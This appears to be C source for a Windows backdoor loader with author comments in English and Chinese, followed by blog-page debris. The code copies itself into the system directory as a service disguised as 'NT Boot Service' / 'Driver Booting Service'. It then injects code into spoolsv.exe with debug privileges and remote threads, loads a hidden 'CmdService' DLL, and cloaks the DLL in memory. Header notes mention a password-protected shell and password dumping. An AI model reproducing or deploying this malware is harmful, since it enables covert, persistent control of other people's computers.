//记得改名为ntboot.exe
/**************************************************************
redesign pack header,BYheader for all instance for reliable trans.
16 BYTE password
8 BYTE reserved
4 BYTE packnum
4 BYTE packlength
解决:密码(drop conn),分片(solve here),丢包,错包(pass an "packet dropped/n" to work)
***************************************************************/
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <Ws2tcpip.h>
#include <time.h>
#include <string.h>
//1Q subsystem
//genernal work function need,"work.h"
//define a external struct for shell ,get/put,DOS
//passdump only in 9x
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
void WINAPI CmdStart(DWORD,LPTSTR *);
void WINAPI CmdControl(DWORD);DWORD WINAPI CmdService(LPVOID);
void InstallCmdService(void);
void RemoveCmdService(void);
void injcode();
struct INJAPISTR
{
HINSTANCE (__stdcall*myLoadLibrary)(LPCTSTR);
FARPROC (__stdcall*myGetProcAddress)(HMODULE,LPCTSTR);
LPVOID (__stdcall*myVirtualAlloc)(LPVOID lpAddress,DWORD dwSize,DWORD flAllocationType,DWORD flProtect);
BOOL (__stdcall*myFreeLibrary)(HMODULE hLibModule);
BOOL (__stdcall*myIsBadReadPtr)(CONST VOID *lp,UINT ucb);
BOOL (__stdcall*myVirtualFree)(LPVOID lpAddress,DWORD dwSize,DWORD dwFreeType);
}injapistr;
int main(int argc,char *argv[])
{
SERVICE_TABLE_ENTRY DispatchTable[] =
{
{"NtBoot",CmdStart},
{NULL ,NULL }
};
if(argc==2)
{
if(!stricmp(argv[1],"-install"))
{
InstallCmdService();return 0;
}
else if(!stricmp(argv[1],"-remove"))
{
RemoveCmdService();return 0;
}
else
{
printf("invailid parameter/n");return 0;
}
}
//MessageBox(0,"","",0); //from this we know that we can do sth before StartServiceCtrlDispatcher
//so we just create a fake service,and exec our inj code here!
//injcode();//no.we find problem
StartServiceCtrlDispatcher(DispatchTable);
return 0;
}
void WINAPI CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE|SERVICE_ACCEPT_STOP ;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
ServiceStatusHandle=RegisterServiceCtrlHandler("NtBoot",CmdControl);
if(ServiceStatusHandle==0)
{
return ;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
{
return ;
}
hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
return ;
}
void WINAPI CmdControl(DWORD dwCode)
{
switch(dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
return ;
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
return ;
}
void InstallCmdService(void)
{
char formerpath[255];
char syspath[255];
int ret;
ret=GetModuleFileName(0,formerpath,256);
GetSystemDirectory(syspath,256);
CopyFile(formerpath,strcat(syspath,"//ntboot.exe"),0);
strcpy(formerpath+ret-10,"ntboot.dll");
GetSystemDirectory(syspath,256);
CopyFile(formerpath,strcat(syspath,"//ntboot.dll"),0);
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
SERVICE_STATUS InstallServiceStatus;
//check if exist
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"//ntboot.exe");
hSearch=FindFirstFile(lpImagePath,&FileData);
printf("Copying file ... ");
if(hSearch==INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==5)
{
printf("Failure ... Access is Denied !/n");
}
else
{
printf("Failure !/n");
}
return ;
}
else
{
printf("Success !/n");
}
}
else
{
printf("already Exists !/n");
FindClose(hSearch);
}
schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
printf("Creating Service .... ");
schService=CreateService(schSCManager,"NtBoot","NT Boot Service",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,"ntboot.exe",NULL,NULL,NULL,NULL,NULL);
if(schService==NULL)
{
dwErrorCode=GetLastError();
if(dwErrorCode!=ERROR_SERVICE_EXISTS)
{
printf("Failure !/n");
CloseServiceHandle(schSCManager);
return ;
}
else
{
printf("already Exists !/n");
schService=OpenService(schSCManager,"ntboot",SERVICE_START);
if(schService==NULL)
{
printf("Opening Service .... Failure !/n");
CloseServiceHandle(schSCManager);
return ;
}
}
}
else
{
printf("Success !/n");
}
printf("Starting Service .... ");
if(StartService(schService,0,NULL)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
printf("already Running !/n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
}
else
{
printf("Pending ... ");
}
while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)
{
if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
{
printf("Failure !/n");
}
else
{
printf("Success !/nDumping Description to Registry.../n");
HKEY hkResult;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM//CurrentControlSet//Services//NtBoot",0,KEY_ALL_ACCESS,&hkResult);
RegSetValueEx(hkResult,"Description",0,REG_SZ,(unsigned char *)"Driver Booting Service",23);
RegCloseKey(hkResult);
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
void RemoveCmdService(void)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpImagePath[MAX_PATH];
WIN32_FIND_DATA FileData;
SERVICE_STATUS RemoveServiceStatus;
HANDLE hSearch;
DWORD dwErrorCode;
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"//ntboot.exe");
schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
schService=OpenService(schSCManager,"ntboot",SERVICE_ALL_ACCESS);
if(schService==NULL)
{
printf("Opening Service ..... ");
dwErrorCode=GetLastError();
if(dwErrorCode==1060)
{
printf("no Exists !/n");
}
else
{
printf("Failure !/n");
}
CloseServiceHandle(schSCManager);
}
else
{
printf("Stopping Service .... ");
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
{
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
{
printf("already Stopped !/n");
}
else
{
printf("Pending ... ");
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
{
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
{
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
}
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
{
printf("Success !/n");
}
else
{
printf("Failure !/n");
}
}
else
{
printf("Failure !/n");
}
}
}
else
{
printf("Query Failure !/n");
}
printf("Removing Service .... ");
if(DeleteService(schService)==0)
{
printf("Failure !/n");
}
else
{
printf("Success !/n");
}
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
printf("Removing File ....... ");
Sleep(1500);
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
{
printf("no Exists !/n");
}
else
{
if(DeleteFile(lpImagePath)==0)
{
printf("Failure !/n");
}
else
{
printf("Success !/n");
}
FindClose(hSearch);
}
return ;
}
DWORD WINAPI CmdService(LPVOID lpParam)
{
injcode();
return 0;
}
void injcode()
{
HANDLE prohandle;
DWORD pid=0;
int ret;
//retrive pid from toolhelp32
Sleep(1000);
HANDLE snapshot;
snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
struct tagPROCESSENTRY32 processsnap;
processsnap.dwSize=sizeof(tagPROCESSENTRY32);
char injexe[]="spoolsv.exe";//used to ppqq.exe to test and winlogon to fail
for(Process32First(snapshot,&processsnap);Process32Next(snapshot,&processsnap);)
{
if(!stricmp(processsnap.szExeFile,injexe))
{
pid=processsnap.th32ProcessID;
break;
}
}
CloseHandle(snapshot);
//SE_DEBUG_NAME,好象没有也可以
HANDLE hToken;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);
//inj
prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid);
DWORD WINAPI injfunc(LPVOID);
HMODULE hModule;LPVOID paramaddr;
hModule=LoadLibrary("kernel32.dll");//printf("%x",hModule);char buf[5000];memcpy(buf,hModule,5000);test:hModule is the addr of the DLL
injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA");
injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress");
injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc");
injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary");
injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr");
injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree");
paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0);
void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0);
//实验
//void* jj=&Sleep;
//1陷阱:MSDN中不声明为WINAPI的其实也是__stdcall的,被SDK隐藏了!
//2SDK API address is not fixed!program call API SDK by call [0040a7c5],and operating system fill this for it
//I know this by OllyDBG
//3weird:failed here.cost me ONE WHOLE DAY TO KNOW THAT I MUST LOAD THE LIBRARY UER32.DLL!!!by LordPE
//but i donnot know how to force VC to contain the DLL in import table
/*
MessageBox(0,0,0,0);
__asm{
push 0
push 0
push 0
push 0
//directly call 0x77e15b82 here will fail to compile
mov eax,0x77e15b82
call eax
}
int (__stdcall *myMessageBox)(HWND hWnd,LPCTSTR lpText,LPCTSTR lpCaption,UINT uType );
myMessageBox=(int (__stdcall *)(HWND hWnd,LPCTSTR lpText,LPCTSTR lpCaption,UINT uType ))0x77e15b82;//0x77e1d483W,0x77e15b82A
myMessageBox(0,0,0,0);
*/
CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0);
CloseHandle(prohandle);
return;
}
//we must tell this inj at least two address,LoadLibrary & GetProcAddress
//we can write these addr in the code section in loader!!(code section re-enter)
//then i know we can use VirtualAllocEx commit memory in remote process
DWORD WINAPI injfunc(LPVOID paramaddr)
{
//4char user32[16]="user32.dll";char msgbox[16]="MessageBoxA";
//此处极郁闷,这些数据不是压入的而是从数据段导入,所以需要重定位。
//实际所有静态全局变量都需要重定位(直接寻址),而动态分配(堆,virtualalloc)和栈变量不需要,因为他们使用间接寻址
//5 we must use release to compile cuz debug will cause problem
//offset in asm,no matter which its base var's type is,is compiled as byte ptr
char ntboot[16];
char msgbox[16];
INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr;
//debug use this
int (__stdcall *myMessageBox)(HWND hWnd,LPCTSTR lpText,LPCTSTR lpCaption,UINT uType );
myMessageBox=(int (__stdcall *)(HWND hWnd,LPCTSTR lpText,LPCTSTR lpCaption,UINT uType ))0x77e15b82;//0x77e1d483W,0x77e15b82A
__asm{
mov ntboot,'n'
mov ntboot+1,'t'
mov ntboot+2,'b'
mov ntboot+3,'o'
mov ntboot+4,'o'
mov ntboot+5,'t'
mov ntboot+6,'.'
mov ntboot+7,'d'
mov ntboot+8,'l'
mov ntboot+9,'l'
mov ntboot+10,0
mov msgbox,'C'
mov msgbox+1,'m'
mov msgbox+2,'d'
mov msgbox+3,'S'
mov msgbox+4,'e'
mov msgbox+5,'r'
mov msgbox+6,'v'
mov msgbox+7,'i'
mov msgbox+8,'c'
mov msgbox+9,'e'
mov msgbox+10,0
}
HMODULE hModule=pinjapistr->myLoadLibrary(ntboot);//if((void*)hModule==(void*)0x10000000){myMessageBox(0,0,0,0);}
DWORD (WINAPI *myCmdService)(LPVOID);
myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox));
//use some tech to release the dll!
//此处不能少复制,但也不能多了,会有读异常,要注意要复制所有有关DLL的内存区段
/*(应该是连续可读的吧)
注意此方法不行。但下文发现的确连续可读,why??
IsBadReadPtr() indicates that itself is not so strong under multi-thread environment
用LORD PE分析发现0x22000就够了。
unsigned int memsize;
for(memsize=0;!pinjapistr->myIsBadReadPtr(hModule+memsize,0x100);memsize+=0x100){}
if(memsize==0x8400){myMessageBox(0,0,0,0);}
void * tempdll=pinjapistr->myVirtualAlloc(0,memsize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
memcpy(tempdll,hModule,memsize);
pinjapistr->myFreeLibrary(hModule);
hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,memsize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
memcpy(hModule,tempdll,memsize);pinjapistr->myVirtualFree(tempdll,memsize,MEM_DECOMMIT);
*/
unsigned int memsize=0;
void * tempdll=pinjapistr->myVirtualAlloc(0,0x23000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
memcpy(tempdll,hModule,0x23000);
pinjapistr->myFreeLibrary(hModule);
hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,0x23000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
memcpy(hModule,tempdll,0x23000);
pinjapistr->myVirtualFree(tempdll,0x23000,MEM_DECOMMIT);
//
myCmdService(0);
return 8;
}
扫一扫
3084
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
